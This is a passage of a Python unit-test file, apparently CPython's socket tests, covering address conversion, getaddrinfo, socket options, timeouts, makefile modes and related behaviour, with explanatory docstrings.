        socket.sethostname(oldhn)
@unittest.skipUnless(hasattr(socket, 'if_nameindex'),
                     'socket.if_nameindex() not available.')
def testInterfaceNameIndex(self):
    """if_nameindex() entries round-trip through if_nametoindex() and
    if_indextoname()."""
    interfaces = socket.if_nameindex()
    for index, name in interfaces:
        self.assertIsInstance(index, int)
        self.assertIsInstance(name, str)
        # interface indices are non-zero integers
        self.assertGreater(index, 0)
        _index = socket.if_nametoindex(name)
        self.assertIsInstance(_index, int)
        self.assertEqual(index, _index)
        _name = socket.if_indextoname(index)
        self.assertIsInstance(_name, str)
        self.assertEqual(name, _name)
@unittest.skipUnless(hasattr(socket, 'if_indextoname'),
                     'socket.if_indextoname() not available.')
def testInvalidInterfaceIndexToName(self):
    """if_indextoname() rejects index 0 (OSError) and non-ints (TypeError)."""
    with self.assertRaises(OSError):
        socket.if_indextoname(0)
    with self.assertRaises(TypeError):
        socket.if_indextoname('_DEADBEEF')
@unittest.skipUnless(hasattr(socket, 'if_nametoindex'),
                     'socket.if_nametoindex() not available.')
def testInvalidInterfaceNameToIndex(self):
    """if_nametoindex() rejects non-str (TypeError) and unknown names (OSError)."""
    with self.assertRaises(TypeError):
        socket.if_nametoindex(0)
    with self.assertRaises(OSError):
        socket.if_nametoindex('_DEADBEEF')
@unittest.skipUnless(hasattr(sys, 'getrefcount'),
                     'test needs sys.getrefcount()')
def testRefCountGetNameInfo(self):
    """getnameinfo() must not leak a reference to its (bad) argument."""
    # Testing reference count for getnameinfo
    try:
        # On some versions, this loses a reference
        orig = sys.getrefcount(__name__)
        # Passing a str where a sockaddr tuple is expected raises TypeError.
        socket.getnameinfo(__name__,0)
    except TypeError:
        if sys.getrefcount(__name__) != orig:
            self.fail("socket.getnameinfo loses a reference")
def testInterpreterCrash(self):
    """getnameinfo() with a bogus sockaddr must not crash the interpreter;
    an OSError is acceptable."""
    # Making sure getnameinfo doesn't crash the interpreter
    try:
        # On some versions, this crashes the interpreter.
        socket.getnameinfo(('x', 0, 0, 0), 0)
    except OSError:
        pass
def testNtoH(self):
    """htons/ntohs and htonl/ntohl are self-inverse on the low 16/32 bits
    and raise OverflowError for values too large for the type."""
    # This just checks that htons etc. are their own inverse,
    # when looking at the lower 16 or 32 bits.
    sizes = {socket.htonl: 32, socket.ntohl: 32,
             socket.htons: 16, socket.ntohs: 16}
    for func, size in sizes.items():
        mask = (1<<size) - 1
        for i in (0, 1, 0xffff, ~0xffff, 2, 0x01234567, 0x76543210):
            self.assertEqual(i & mask, func(func(i&mask)) & mask)
        # An all-ones value byte-swaps to itself within the mask.
        swapped = func(mask)
        self.assertEqual(swapped & mask, mask)
        # 1<<34 doesn't fit in 32 bits, let alone 16.
        self.assertRaises(OverflowError, func, 1<<34)
@support.cpython_only
def testNtoHErrors(self):
    """Boundary behaviour of htons/ntohs/htonl/ntohl: in-range values
    pass, negatives/oversized raise OverflowError, and 16-bit overflow
    into int range warns DeprecationWarning (CPython-specific)."""
    import _testcapi
    s_good_values = [0, 1, 2, 0xffff]
    l_good_values = s_good_values + [0xffffffff]
    l_bad_values = [-1, -2, 1<<32, 1<<1000]
    s_bad_values = l_bad_values + [_testcapi.INT_MIN - 1,
                                   _testcapi.INT_MAX + 1]
    # Values that fit a C int but not 16 bits: deprecated, not an error.
    s_deprecated_values = [1<<16, _testcapi.INT_MAX]
    for k in s_good_values:
        socket.ntohs(k)
        socket.htons(k)
    for k in l_good_values:
        socket.ntohl(k)
        socket.htonl(k)
    for k in s_bad_values:
        self.assertRaises(OverflowError, socket.ntohs, k)
        self.assertRaises(OverflowError, socket.htons, k)
    for k in l_bad_values:
        self.assertRaises(OverflowError, socket.ntohl, k)
        self.assertRaises(OverflowError, socket.htonl, k)
    for k in s_deprecated_values:
        self.assertWarns(DeprecationWarning, socket.ntohs, k)
        self.assertWarns(DeprecationWarning, socket.htons, k)
def testGetServBy(self):
    """getservbyname()/getservbyport() agree for a service that exists,
    for tcp and (if present) udp, with platform-specific exclusions.

    NOTE(review): port2 is only bound inside the Android API-level
    guard; the later getservbyport(port2) call is itself guarded by
    `not support.is_android`, which keeps the two paths consistent.
    """
    eq = self.assertEqual
    # Find one service that exists, then check all the related interfaces.
    # I've ordered this by protocols that have both a tcp and udp
    # protocol, at least for modern Linuxes.
    if (sys.platform.startswith(('freebsd', 'netbsd', 'gnukfreebsd'))
            or sys.platform in ('linux', 'darwin')):
        # avoid the 'echo' service on this platform, as there is an
        # assumption breaking non-standard port/protocol entry
        services = ('daytime', 'qotd', 'domain')
    else:
        services = ('echo', 'daytime', 'domain')
    for service in services:
        try:
            port = socket.getservbyname(service, 'tcp')
            break
        except OSError:
            pass
    else:
        # None of the candidate services resolved at all.
        raise OSError
    # Try same call with optional protocol omitted
    # Issue #26936: Android getservbyname() was broken before API 23.
    if (not hasattr(sys, 'getandroidapilevel') or
            sys.getandroidapilevel() >= 23):
        port2 = socket.getservbyname(service)
        eq(port, port2)
    # Try udp, but don't barf if it doesn't exist
    try:
        udpport = socket.getservbyname(service, 'udp')
    except OSError:
        udpport = None
    else:
        eq(udpport, port)
    # Now make sure the lookup by port returns the same service name
    # Issue #26936: Android getservbyport() is broken.
    if not support.is_android:
        eq(socket.getservbyport(port2), service)
    eq(socket.getservbyport(port, 'tcp'), service)
    if udpport is not None:
        eq(socket.getservbyport(udpport, 'udp'), service)
    # Make sure getservbyport does not accept out of range ports.
    self.assertRaises(OverflowError, socket.getservbyport, -1)
    self.assertRaises(OverflowError, socket.getservbyport, 65536)
def testDefaultTimeout(self):
    """setdefaulttimeout() propagates to new sockets; invalid values
    raise ValueError/TypeError. Uses the socket_setdefaulttimeout
    context manager to restore the module-global default."""
    # Testing default timeout
    # The default timeout should initially be None
    self.assertEqual(socket.getdefaulttimeout(), None)
    with socket.socket() as s:
        self.assertEqual(s.gettimeout(), None)
    # Set the default timeout to 10, and see if it propagates
    with socket_setdefaulttimeout(10):
        self.assertEqual(socket.getdefaulttimeout(), 10)
        with socket.socket() as sock:
            self.assertEqual(sock.gettimeout(), 10)
        # Reset the default timeout to None, and see if it propagates
        socket.setdefaulttimeout(None)
        self.assertEqual(socket.getdefaulttimeout(), None)
        with socket.socket() as sock:
            self.assertEqual(sock.gettimeout(), None)
    # Check that setting it to an invalid value raises ValueError
    self.assertRaises(ValueError, socket.setdefaulttimeout, -1)
    # Check that setting it to an invalid type raises TypeError
    self.assertRaises(TypeError, socket.setdefaulttimeout, "spam")
@unittest.skipUnless(hasattr(socket, 'inet_aton'),
                     'test needs socket.inet_aton()')
def testIPv4_inet_aton_fourbytes(self):
    """inet_aton() must always return exactly 4 bytes
    (regression test for issue1008086 and issue767150)."""
    self.assertEqual(socket.inet_aton('0.0.0.0'), b'\x00'*4)
    self.assertEqual(socket.inet_aton('255.255.255.255'), b'\xff'*4)
@unittest.skipUnless(hasattr(socket, 'inet_pton'),
                     'test needs socket.inet_pton()')
def testIPv4toString(self):
    """inet_aton() (f) and inet_pton(AF_INET) (g) pack dotted quads the
    same way and reject malformed input."""
    from socket import inet_aton as f, inet_pton, AF_INET
    g = lambda a: inet_pton(AF_INET, a)
    assertInvalid = lambda func,a: self.assertRaises(
        (OSError, ValueError), func, a
    )
    self.assertEqual(b'\x00\x00\x00\x00', f('0.0.0.0'))
    self.assertEqual(b'\xff\x00\xff\x00', f('255.0.255.0'))
    self.assertEqual(b'\xaa\xaa\xaa\xaa', f('170.170.170.170'))
    self.assertEqual(b'\x01\x02\x03\x04', f('1.2.3.4'))
    self.assertEqual(b'\xff\xff\xff\xff', f('255.255.255.255'))
    # bpo-29972: inet_pton() doesn't fail on AIX
    if not AIX:
        assertInvalid(f, '0.0.0.')
        assertInvalid(f, '300.0.0.0')
        assertInvalid(f, 'a.0.0.0')
        assertInvalid(f, '1.2.3.4.5')
        assertInvalid(f, '::1')
    self.assertEqual(b'\x00\x00\x00\x00', g('0.0.0.0'))
    self.assertEqual(b'\xff\x00\xff\x00', g('255.0.255.0'))
    self.assertEqual(b'\xaa\xaa\xaa\xaa', g('170.170.170.170'))
    self.assertEqual(b'\xff\xff\xff\xff', g('255.255.255.255'))
    assertInvalid(g, '0.0.0.')
    assertInvalid(g, '300.0.0.0')
    assertInvalid(g, 'a.0.0.0')
    assertInvalid(g, '1.2.3.4.5')
    assertInvalid(g, '::1')
@unittest.skipUnless(hasattr(socket, 'inet_pton'),
                     'test needs socket.inet_pton()')
def testIPv6toString(self):
    """inet_pton(AF_INET6) packs textual IPv6 (incl. embedded IPv4
    forms) and rejects malformed addresses."""
    try:
        from socket import inet_pton, AF_INET6, has_ipv6
        if not has_ipv6:
            self.skipTest('IPv6 not available')
    except ImportError:
        self.skipTest('could not import needed symbols from socket')
    if sys.platform == "win32":
        try:
            inet_pton(AF_INET6, '::')
        except OSError as e:
            # WSAEINVAL: IPv6 stack not installed/enabled.
            if e.winerror == 10022:
                self.skipTest('IPv6 might not be supported')
    f = lambda a: inet_pton(AF_INET6, a)
    assertInvalid = lambda a: self.assertRaises(
        (OSError, ValueError), f, a
    )
    self.assertEqual(b'\x00' * 16, f('::'))
    self.assertEqual(b'\x00' * 16, f('0::0'))
    self.assertEqual(b'\x00\x01' + b'\x00' * 14, f('1::'))
    self.assertEqual(
        b'\x45\xef\x76\xcb\x00\x1a\x56\xef\xaf\xeb\x0b\xac\x19\x24\xae\xae',
        f('45ef:76cb:1a:56ef:afeb:bac:1924:aeae')
    )
    self.assertEqual(
        b'\xad\x42\x0a\xbc' + b'\x00' * 4 + b'\x01\x27\x00\x00\x02\x54\x00\x02',
        f('ad42:abc::127:0:254:2')
    )
    self.assertEqual(b'\x00\x12\x00\x0a' + b'\x00' * 12, f('12:a::'))
    assertInvalid('0x20::')
    assertInvalid(':::')
    assertInvalid('::0::')
    assertInvalid('1::abc::')
    assertInvalid('1::abc::def')
    assertInvalid('1:2:3:4:5:6')
    assertInvalid('1:2:3:4:5:6:')
    assertInvalid('1:2:3:4:5:6:7:8:0')
    # bpo-29972: inet_pton() doesn't fail on AIX
    if not AIX:
        assertInvalid('1:2:3:4:5:6:7:8:')
    # IPv4-embedded forms.
    self.assertEqual(b'\x00' * 12 + b'\xfe\x2a\x17\x40',
        f('::254.42.23.64')
    )
    self.assertEqual(
        b'\x00\x42' + b'\x00' * 8 + b'\xa2\x9b\xfe\x2a\x17\x40',
        f('42::a29b:254.42.23.64')
    )
    self.assertEqual(
        b'\x00\x42\xa8\xb9\x00\x00\x00\x02\xff\xff\xa2\x9b\xfe\x2a\x17\x40',
        f('42:a8b9:0:2:ffff:a29b:254.42.23.64')
    )
    assertInvalid('255.254.253.252')
    assertInvalid('1::260.2.3.0')
    assertInvalid('1::0.be.e.0')
    assertInvalid('1:2:3:4:5:6:7:1.2.3.4')
    assertInvalid('::1.2.3.4:0')
    assertInvalid('0.100.200.0:3:4:5:6:7:8')
@unittest.skipUnless(hasattr(socket, 'inet_ntop'),
                     'test needs socket.inet_ntop()')
def testStringToIPv4(self):
    """inet_ntoa() (f) and inet_ntop(AF_INET) (g) format 4-byte packed
    addresses identically and reject wrong-sized input."""
    from socket import inet_ntoa as f, inet_ntop, AF_INET
    g = lambda a: inet_ntop(AF_INET, a)
    assertInvalid = lambda func,a: self.assertRaises(
        (OSError, ValueError), func, a
    )
    self.assertEqual('1.0.1.0', f(b'\x01\x00\x01\x00'))
    self.assertEqual('170.85.170.85', f(b'\xaa\x55\xaa\x55'))
    self.assertEqual('255.255.255.255', f(b'\xff\xff\xff\xff'))
    self.assertEqual('1.2.3.4', f(b'\x01\x02\x03\x04'))
    assertInvalid(f, b'\x00' * 3)
    assertInvalid(f, b'\x00' * 5)
    assertInvalid(f, b'\x00' * 16)
    # bytearray (any bytes-like) is accepted too.
    self.assertEqual('170.85.170.85', f(bytearray(b'\xaa\x55\xaa\x55')))
    self.assertEqual('1.0.1.0', g(b'\x01\x00\x01\x00'))
    self.assertEqual('170.85.170.85', g(b'\xaa\x55\xaa\x55'))
    self.assertEqual('255.255.255.255', g(b'\xff\xff\xff\xff'))
    assertInvalid(g, b'\x00' * 3)
    assertInvalid(g, b'\x00' * 5)
    assertInvalid(g, b'\x00' * 16)
    self.assertEqual('170.85.170.85', g(bytearray(b'\xaa\x55\xaa\x55')))
@unittest.skipUnless(hasattr(socket, 'inet_ntop'),
                     'test needs socket.inet_ntop()')
def testStringToIPv6(self):
    """inet_ntop(AF_INET6) formats 16-byte packed addresses and rejects
    wrong-sized input."""
    try:
        from socket import inet_ntop, AF_INET6, has_ipv6
        if not has_ipv6:
            self.skipTest('IPv6 not available')
    except ImportError:
        self.skipTest('could not import needed symbols from socket')
    if sys.platform == "win32":
        try:
            inet_ntop(AF_INET6, b'\x00' * 16)
        except OSError as e:
            # WSAEINVAL: IPv6 stack not installed/enabled.
            if e.winerror == 10022:
                self.skipTest('IPv6 might not be supported')
    f = lambda a: inet_ntop(AF_INET6, a)
    assertInvalid = lambda a: self.assertRaises(
        (OSError, ValueError), f, a
    )
    self.assertEqual('::', f(b'\x00' * 16))
    self.assertEqual('::1', f(b'\x00' * 15 + b'\x01'))
    self.assertEqual(
        'aef:b01:506:1001:ffff:9997:55:170',
        f(b'\x0a\xef\x0b\x01\x05\x06\x10\x01\xff\xff\x99\x97\x00\x55\x01\x70')
    )
    # bytearray (any bytes-like) is accepted too.
    self.assertEqual('::1', f(bytearray(b'\x00' * 15 + b'\x01')))
    assertInvalid(b'\x12' * 15)
    assertInvalid(b'\x12' * 17)
    assertInvalid(b'\x12' * 4)
# XXX The following don't test module-level functionality...
def testSockName(self):
    """getsockname() on a socket bound to INADDR_ANY reports the bound
    port and either 0.0.0.0 or the host's own address."""
    # Testing getsockname()
    port = support.find_unused_port()
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    self.addCleanup(sock.close)
    sock.bind(("0.0.0.0", port))
    name = sock.getsockname()
    # XXX(nnorwitz): http://tinyurl.com/os5jz seems to indicate
    # it reasonable to get the host's addr in addition to 0.0.0.0.
    # At least for eCos. This is required for the S/390 to pass.
    try:
        my_ip_addr = socket.gethostbyname(socket.gethostname())
    except OSError:
        # Probably name lookup wasn't set up right; skip this test
        self.skipTest('name lookup failure')
    self.assertIn(name[0], ("0.0.0.0", my_ip_addr), '%s invalid' % name[0])
    self.assertEqual(name[1], port)
def testGetSockOpt(self):
    """A freshly created socket must have SO_REUSEADDR disabled (0)."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    self.addCleanup(sock.close)
    reuse = sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR)
    # Direct assertEqual replaces the original double-negative
    # assertFalse(reuse != 0, ...) — same pass/fail, clearer report.
    self.assertEqual(reuse, 0, "initial mode is reuse")
def testSetSockOpt(self):
    """setsockopt(SO_REUSEADDR, 1) must be observable via getsockopt()."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    self.addCleanup(sock.close)
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    reuse = sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR)
    # assertNotEqual replaces the original double-negative
    # assertFalse(reuse == 0, ...) — same pass/fail, clearer report.
    self.assertNotEqual(reuse, 0, "failed to set reuse mode")
def testSendAfterClose(self):
    """send() on an already-closed socket (with a timeout set) raises OSError."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(1)
    sock.close()
    self.assertRaises(OSError, sock.send, b"spam")
def testCloseException(self):
    """Closing a socket whose fd was already closed (via a second socket
    object wrapping the same fileno) raises EBADF/ENOTSOCK."""
    sock = socket.socket()
    sock.bind((socket._LOCALHOST, 0))
    # Wrap the same fd in a second socket object and close it; this
    # closes the underlying fd out from under `sock`.
    socket.socket(fileno=sock.fileno()).close()
    try:
        sock.close()
    except OSError as err:
        # Winsock apparently raises ENOTSOCK
        self.assertIn(err.errno, (errno.EBADF, errno.ENOTSOCK))
    else:
        self.fail("close() should raise EBADF/ENOTSOCK")
def testNewAttributes(self):
    """The .family, .type and .proto attributes reflect construction
    arguments; SOCK_CLOEXEC may be OR'd into .type on platforms that
    define it."""
    # testing .family, .type and .protocol
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
        self.assertEqual(sock.family, socket.AF_INET)
        if hasattr(socket, 'SOCK_CLOEXEC'):
            self.assertIn(sock.type,
                          (socket.SOCK_STREAM | socket.SOCK_CLOEXEC,
                           socket.SOCK_STREAM))
        else:
            self.assertEqual(sock.type, socket.SOCK_STREAM)
        self.assertEqual(sock.proto, 0)
def test_getsockaddrarg(self):
    """bind() rejects out-of-range port numbers with OverflowError, and
    accepts a valid unused port (with retries for bind races)."""
    sock = socket.socket()
    self.addCleanup(sock.close)
    port = support.find_unused_port()
    big_port = port + 65536
    neg_port = port - 65536
    self.assertRaises(OverflowError, sock.bind, (HOST, big_port))
    self.assertRaises(OverflowError, sock.bind, (HOST, neg_port))
    # Since find_unused_port() is inherently subject to race conditions, we
    # call it a couple times if necessary.
    for i in itertools.count():
        port = support.find_unused_port()
        try:
            sock.bind((HOST, port))
        except OSError as e:
            # Give up after 5 EADDRINUSE retries; re-raise other errors.
            if e.errno != errno.EADDRINUSE or i == 5:
                raise
        else:
            break
@unittest.skipUnless(os.name == "nt", "Windows specific")
def test_sock_ioctl(self):
    """Windows-only: socket.ioctl() and the SIO_*/RCVALL_* constants
    exist; SIO_KEEPALIVE_VALS accepts a (onoff, time, interval) tuple."""
    self.assertTrue(hasattr(socket.socket, 'ioctl'))
    self.assertTrue(hasattr(socket, 'SIO_RCVALL'))
    self.assertTrue(hasattr(socket, 'RCVALL_ON'))
    self.assertTrue(hasattr(socket, 'RCVALL_OFF'))
    self.assertTrue(hasattr(socket, 'SIO_KEEPALIVE_VALS'))
    s = socket.socket()
    self.addCleanup(s.close)
    # Unknown control code is rejected.
    self.assertRaises(ValueError, s.ioctl, -1, None)
    s.ioctl(socket.SIO_KEEPALIVE_VALS, (1, 100, 100))
@unittest.skipUnless(os.name == "nt", "Windows specific")
@unittest.skipUnless(hasattr(socket, 'SIO_LOOPBACK_FAST_PATH'),
                     'Loopback fast path support required for this test')
def test_sio_loopback_fast_path(self):
    """Windows-only: SIO_LOOPBACK_FAST_PATH can be enabled via ioctl();
    unsupported Windows versions skip, and a None argument is a TypeError."""
    s = socket.socket()
    self.addCleanup(s.close)
    try:
        s.ioctl(socket.SIO_LOOPBACK_FAST_PATH, True)
    except OSError as exc:
        WSAEOPNOTSUPP = 10045
        if exc.winerror == WSAEOPNOTSUPP:
            # Message grammar fixed ("doesn't implemented" -> "isn't
            # implemented"); skipTest raises, so no fall-through to raise.
            self.skipTest("SIO_LOOPBACK_FAST_PATH is defined but "
                          "isn't implemented in this Windows version")
        raise
    self.assertRaises(TypeError, s.ioctl, socket.SIO_LOOPBACK_FAST_PATH, None)
def testGetaddrinfo(self):
    """Broad getaddrinfo() coverage: result shape, host/port argument
    forms, family/type/proto/flags filters, keyword arguments, and a
    couple of historical crash/regression cases."""
    try:
        socket.getaddrinfo('localhost', 80)
    except socket.gaierror as err:
        if err.errno == socket.EAI_SERVICE:
            # see http://bugs.python.org/issue1282647
            self.skipTest("buggy libc version")
        raise
    # len of every sequence is supposed to be == 5
    for info in socket.getaddrinfo(HOST, None):
        self.assertEqual(len(info), 5)
    # host can be a domain name, a string representation of an
    # IPv4/v6 address or None
    socket.getaddrinfo('localhost', 80)
    socket.getaddrinfo('127.0.0.1', 80)
    socket.getaddrinfo(None, 80)
    if support.IPV6_ENABLED:
        socket.getaddrinfo('::1', 80)
    # port can be a string service name such as "http", a numeric
    # port number or None
    # Issue #26936: Android getaddrinfo() was broken before API level 23.
    if (not hasattr(sys, 'getandroidapilevel') or
            sys.getandroidapilevel() >= 23):
        socket.getaddrinfo(HOST, "http")
    socket.getaddrinfo(HOST, 80)
    socket.getaddrinfo(HOST, None)
    # test family and socktype filters
    infos = socket.getaddrinfo(HOST, 80, socket.AF_INET, socket.SOCK_STREAM)
    for family, type, _, _, _ in infos:
        self.assertEqual(family, socket.AF_INET)
        self.assertEqual(str(family), 'AddressFamily.AF_INET')
        self.assertEqual(type, socket.SOCK_STREAM)
        self.assertEqual(str(type), 'SocketKind.SOCK_STREAM')
    infos = socket.getaddrinfo(HOST, None, 0, socket.SOCK_STREAM)
    for _, socktype, _, _, _ in infos:
        self.assertEqual(socktype, socket.SOCK_STREAM)
    # test proto and flags arguments
    socket.getaddrinfo(HOST, None, 0, 0, socket.SOL_TCP)
    socket.getaddrinfo(HOST, None, 0, 0, 0, socket.AI_PASSIVE)
    # a server willing to support both IPv4 and IPv6 will
    # usually do this
    socket.getaddrinfo(None, 0, socket.AF_UNSPEC, socket.SOCK_STREAM, 0,
                       socket.AI_PASSIVE)
    # test keyword arguments
    a = socket.getaddrinfo(HOST, None)
    b = socket.getaddrinfo(host=HOST, port=None)
    self.assertEqual(a, b)
    a = socket.getaddrinfo(HOST, None, socket.AF_INET)
    b = socket.getaddrinfo(HOST, None, family=socket.AF_INET)
    self.assertEqual(a, b)
    a = socket.getaddrinfo(HOST, None, 0, socket.SOCK_STREAM)
    b = socket.getaddrinfo(HOST, None, type=socket.SOCK_STREAM)
    self.assertEqual(a, b)
    a = socket.getaddrinfo(HOST, None, 0, 0, socket.SOL_TCP)
    b = socket.getaddrinfo(HOST, None, proto=socket.SOL_TCP)
    self.assertEqual(a, b)
    a = socket.getaddrinfo(HOST, None, 0, 0, 0, socket.AI_PASSIVE)
    b = socket.getaddrinfo(HOST, None, flags=socket.AI_PASSIVE)
    self.assertEqual(a, b)
    a = socket.getaddrinfo(None, 0, socket.AF_UNSPEC, socket.SOCK_STREAM, 0,
                           socket.AI_PASSIVE)
    b = socket.getaddrinfo(host=None, port=0, family=socket.AF_UNSPEC,
                           type=socket.SOCK_STREAM, proto=0,
                           flags=socket.AI_PASSIVE)
    self.assertEqual(a, b)
    # Issue #6697.
    self.assertRaises(UnicodeEncodeError, socket.getaddrinfo, 'localhost', '\uD800')
    # Issue 17269: test workaround for OS X platform bug segfault
    if hasattr(socket, 'AI_NUMERICSERV'):
        try:
            # The arguments here are undefined and the call may succeed
            # or fail.  All we care here is that it doesn't segfault.
            socket.getaddrinfo("localhost", None, 0, 0, 0,
                               socket.AI_NUMERICSERV)
        except socket.gaierror:
            pass
def test_getnameinfo(self):
    """getnameinfo() accepts only numeric addresses, not host names."""
    with self.assertRaises(OSError):
        socket.getnameinfo(('mail.python.org', 0), 0)
@unittest.skipUnless(support.is_resource_enabled('network'),
                     'network is not enabled')
def test_idna(self):
    """Non-ASCII (IDNA) host names resolve via gethostbyname(),
    gethostbyname_ex() and getaddrinfo(). Requires real network access."""
    # Check for internet access before running test
    # (issue #12804, issue #25138).
    with support.transient_internet('python.org'):
        socket.gethostbyname('python.org')
    # these should all be successful
    domain = 'испытание.pythontest.net'
    socket.gethostbyname(domain)
    socket.gethostbyname_ex(domain)
    socket.getaddrinfo(domain,0,socket.AF_UNSPEC,socket.SOCK_STREAM)
    # this may not work if the forward lookup chooses the IPv6 address, as that doesn't
    # have a reverse entry yet
    # socket.gethostbyaddr('испытание.python.org')
def check_sendall_interrupted(self, with_timeout):
    """Helper: a signal arriving during a blocking sendall() must
    propagate handler exceptions (and, with a timeout set, must not
    corrupt errno — the handler deliberately clobbers C errno)."""
    # socketpair() is not strictly required, but it makes things easier.
    if not hasattr(signal, 'alarm') or not hasattr(socket, 'socketpair'):
        self.skipTest("signal.alarm and socket.socketpair required for this test")
    # Our signal handlers clobber the C errno by calling a math function
    # with an invalid domain value.
    def ok_handler(*args):
        self.assertRaises(ValueError, math.acosh, 0)
    def raising_handler(*args):
        self.assertRaises(ValueError, math.acosh, 0)
        1 // 0
    c, s = socket.socketpair()
    old_alarm = signal.signal(signal.SIGALRM, raising_handler)
    try:
        if with_timeout:
            # Just above the one second minimum for signal.alarm
            c.settimeout(1.5)
        with self.assertRaises(ZeroDivisionError):
            signal.alarm(1)
            # sendall() blocks (peer never reads), so the alarm fires
            # mid-call and the handler's ZeroDivisionError propagates.
            c.sendall(b"x" * support.SOCK_MAX_SIZE)
        if with_timeout:
            signal.signal(signal.SIGALRM, ok_handler)
            signal.alarm(1)
            self.assertRaises(socket.timeout, c.sendall,
                              b"x" * support.SOCK_MAX_SIZE)
    finally:
        signal.alarm(0)
        signal.signal(signal.SIGALRM, old_alarm)
        c.close()
        s.close()
def test_sendall_interrupted(self):
    """sendall() without a timeout: handler exceptions propagate."""
    self.check_sendall_interrupted(with_timeout=False)
def test_sendall_interrupted_with_timeout(self):
    """sendall() with a timeout: handler exceptions and timeouts both work."""
    self.check_sendall_interrupted(with_timeout=True)
def test_dealloc_warn(self):
    """Garbage-collecting an open socket emits a ResourceWarning naming
    the socket; a makefile() object keeps warning after the socket dies."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    r = repr(sock)
    with self.assertWarns(ResourceWarning) as cm:
        sock = None
        support.gc_collect()
    self.assertIn(r, str(cm.warning.args[0]))
    # An open socket file object gets dereferenced after the socket
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    f = sock.makefile('rb')
    r = repr(sock)
    sock = None
    support.gc_collect()
    with self.assertWarns(ResourceWarning):
        f = None
        support.gc_collect()
def test_name_closed_socketio(self):
    """A closed makefile() reader reprs with name=-1, not a stale fd."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
        reader = sock.makefile("rb")
        reader.close()
        self.assertEqual("<_io.BufferedReader name=-1>", repr(reader))
def test_unusable_closed_socketio(self):
    """After close(), a raw makefile() object raises ValueError from the
    readable/writable/seekable queries."""
    with socket.socket() as sock:
        fp = sock.makefile("rb", buffering=0)
        self.assertTrue(fp.readable())
        self.assertFalse(fp.writable())
        self.assertFalse(fp.seekable())
        fp.close()
        self.assertRaises(ValueError, fp.readable)
        self.assertRaises(ValueError, fp.writable)
        self.assertRaises(ValueError, fp.seekable)
def test_socket_close(self):
    """socket.close(fd) closes the fd (later ops raise OSError), rejects
    None (TypeError) and negative fds (OSError)."""
    sock = socket.socket()
    try:
        sock.bind((HOST, 0))
        # Close the underlying fd out from under the socket object.
        socket.close(sock.fileno())
        with self.assertRaises(OSError):
            sock.listen(1)
    finally:
        with self.assertRaises(OSError):
            # sock.close() fails with EBADF
            sock.close()
    with self.assertRaises(TypeError):
        socket.close(None)
    with self.assertRaises(OSError):
        socket.close(-1)
def test_makefile_mode(self):
    """makefile() accepts the r/w/b mode combinations and records them."""
    for mode in ('r', 'rb', 'rw', 'w', 'wb'):
        with self.subTest(mode=mode):
            with socket.socket() as sock, sock.makefile(mode) as fp:
                self.assertEqual(mode, fp.mode)
def test_makefile_invalid_mode(self):
    """makefile() rejects text/exclusive/update/append modes."""
    for mode in ('rt', 'x', '+', 'a'):
        with self.subTest(mode=mode):
            with socket.socket() as sock:
                self.assertRaisesRegex(ValueError, 'invalid mode',
                                       sock.makefile, mode)
def test_pickle(self):
    """Socket objects are unpicklable (TypeError) at every protocol, but
    the AF_*/SOCK_* enum constants pickle and round-trip."""
    sock = socket.socket()
    with sock:
        for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
            self.assertRaises(TypeError, pickle.dumps, sock, protocol)
    for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
        family = pickle.loads(pickle.dumps(socket.AF_INET, protocol))
        self.assertEqual(family, socket.AF_INET)
        type = pickle.loads(pickle.dumps(socket.SOCK_STREAM, protocol))
        self.assertEqual(type, socket.SOCK_STREAM)
def test_listen_backlog(self):
    """listen() accepts zero and negative backlogs, and no argument at all."""
    for backlog in (0, -1):
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
            srv.bind((HOST, 0))
            srv.listen(backlog)
    # The backlog argument is optional.
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
        srv.bind((HOST, 0))
        srv.listen()
@support.cpython_only
def test_listen_backlog_overflow(self):
    """A backlog larger than a C int raises OverflowError (issue 15989)."""
    # Issue 15989
    import _testcapi
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
        srv.bind((HOST, 0))
        self.assertRaises(OverflowError, srv.listen, _testcapi.INT_MAX + 1)
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
def test_flowinfo(self):
    """Out-of-range IPv6 flowinfo values raise OverflowError from both
    getnameinfo() and bind()."""
    self.assertRaises(OverflowError, socket.getnameinfo,
                      (support.HOSTv6, 0, 0xffffffff), 0)
    with socket.socket(socket.AF_INET6, socket.SOCK_STREAM) as s:
        self.assertRaises(OverflowError, s.bind, (support.HOSTv6, 0, -10))
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
def test_getaddrinfo_ipv6_basic(self):
    """getaddrinfo() normalizes IPv6 literals to lowercase hex."""
    ((*_, sockaddr),) = socket.getaddrinfo(
        'ff02::1de:c0:face:8D',  # Note capital letter `D`.
        1234, socket.AF_INET6,
        socket.SOCK_DGRAM,
        socket.IPPROTO_UDP
    )
    self.assertEqual(sockaddr, ('ff02::1de:c0:face:8d', 1234, 0, 0))
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipIf(sys.platform == 'win32', 'does not work on Windows')
@unittest.skipIf(AIX, 'Symbolic scope id does not work')
def test_getaddrinfo_ipv6_scopeid_symbolic(self):
    """A '%ifname' scope suffix is resolved to the numeric scope id in
    the returned sockaddr, and stripped from the address text."""
    # Just pick up any network interface (Linux, Mac OS X)
    (ifindex, test_interface) = socket.if_nameindex()[0]
    ((*_, sockaddr),) = socket.getaddrinfo(
        'ff02::1de:c0:face:8D%' + test_interface,
        1234, socket.AF_INET6,
        socket.SOCK_DGRAM,
